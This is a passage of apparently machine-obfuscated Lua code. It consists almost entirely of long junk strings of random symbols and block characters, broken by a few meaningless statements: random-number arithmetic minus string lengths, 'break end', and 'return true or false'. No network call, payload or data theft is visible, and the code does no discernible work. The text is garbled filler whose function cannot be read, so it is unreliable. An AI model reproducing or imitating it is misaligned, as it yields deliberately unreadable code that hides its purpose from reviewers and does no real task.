#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))break end;local o=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))break end;local p=(tonumber(math.floor(math.floor(math.random(23455632,45632456),math.huge or math.abs(1 or 1^2351*143463/1))))-#"!%@346^@&#487@#^$&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████)x*(R2FY@#*(zxry(#*@CXRY@#*(ycr&(@#yr&*(bY2398ry@#(*xyrNZ978████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&████████████████████████████████████████████@(u#RXY@#&(rY#*@&tyzr&@#yxr79@#y9R7T2X3&(RXT2███████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f&*@#^5r78r@^#&*%^ @*#&685 █████████████████████████████████████████████████████████████████████████████████████████████████████@#*(rcx@*(#cry(&#@ycr(*@#yxr(*@#yxcr*(@y#(cr█████████████████████████████████#@xu(xxry@(#c&Rbcy(@#xr&y*()#@ycrx(*@#ycr(x&*@y#c&*(rY@#(&cyxrt██████████████████████████████████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████████████████████████████████████████████!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&██████████████████████████████████████████████████████(*rYx@#&*ryc&*#@CYR@&*#cyrx@#&*(crtx@#&*crt*@#xt&R█████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f█████████████████████████████████████c@#*yrg@*#&rcy&@*#cry(@#yrc*(@#ycr(*@#ycr(@*#&tcyr(&@#*tbcr@#&*cry*&@#tCR&*@███████████████████████████████████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████@#o*xrY@#*()XRY@#*(RYN89@#YNZRX89@#yRZX98@#xy███████████████████████████████@x#)r*u@#*()RYz@#*(xry782#YRX72Y39XRY2#(&RY782X3Y██████████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&███████████████████████████████████████████████████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe██████████████████████(*r#Y3@*(xRY@#(*RUZ@#*()ryn*(@x#yr98@#yx(r*y@n#(R8ZUY████████████████████████████████████████████████#(&*wrcy@#(&RXYN(z@#*ryn)*(@!#ynrX0@x#yuzr*(&@#y(rd*U#s@*()SYR██████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████████████████████████████████████@o*crtu@x#(*crtxy@#(8XRy@#(*cxry@#(&cry@#&*cry*&@#ycr*@#^&txryb*&@#tbcr*x██████████████████████████████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f!%@346^@&#487@#^$@IUXTRy@#*(TRY@*)#(YRTN*(#@CYRT@#(YCTXR@#*(CTRYX89&*@#54r&*@#%$^&@#%4^&*@#%$R&*(@#^%R(&*@#^5r78r@^#&*%^ @*#&685 ████████████████!@(&*erxty!*&@rt!*@#&^XTR*!@^&xe███████████████████████████████████████████████████████████████████@x#r(*@y#r(x&c@#t^cr(*&@#tb&*crtb@#cr*(&t@#&(rZtg@#&rxYB@#(*cry@#*&crt@#&*ry(@#xyr9Y█████████████████████████████████████████████████████████████████████████████████x@&*#ry@&*#TRYb@#&*rbt*@&#TBR8████████████████^@!#&*$^!@$&^%!@^$&%!@&*$^@#&*%^@#&*%^@#*&VGGEYWGFYIYUWEGFUIWEYGFIUEWYFIUWEWYFIYUWEGFUYGEWFUYG^*#&T@*&RFTYUG@#^*$G*@^GF#*TG@*████████████████X@#687RTB@#678R@#^&RT@#*&rt@#^&*rxT@*#&█████████████@&(#yrc&*(@#tyrc&(*@#yrc&*██████████████████████*(@#YCR&*(@#yrcx*&(#@tbrc*&@#trc&*b@t#*r&ct@#██████████████████████████████████2Y EF872T3EF78TB8672CT87tx#@&*xrt@x#&*tr@&*#trbC8@ #bt &*C██████████████████████████████████████2YWEF7823YCRF7823YTR6782X3TXER6723TRX67█████████████████H&*(#H@&*DFH@*#&FRY&*@#tr&*@#YTR79@#YR(@#Yr78@#TGfG@T*#^f")^tostring(math.huge*2346425^3562435 or math.ceil(math.random(1 or 1-1+1/0)))end)break end;return true or false
end)
